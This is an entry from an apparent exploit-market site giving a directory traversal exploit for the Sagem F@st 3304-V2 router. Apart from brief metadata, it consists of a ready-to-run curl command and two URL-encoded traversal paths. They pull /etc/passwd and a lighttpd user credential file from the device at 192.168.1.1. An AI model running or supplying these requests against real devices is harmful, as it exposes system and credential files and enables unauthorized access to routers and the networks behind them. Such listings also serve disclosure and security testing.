[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sagem F@st 3304-V2 Directory Traversal Vulnerability

Author
Loudiyi.MOhamed
Risk
[
Security Risk High
]
0day-ID
0day-ID-23339
Category
web applications
Date add
02-03-2015
Platform
hardware
The vulnerability may be tested with the following command-line:
curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd
Or directly from navigateur:
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/ffs/A/lighttpd.user

#  0day.today [2024-12-24]  #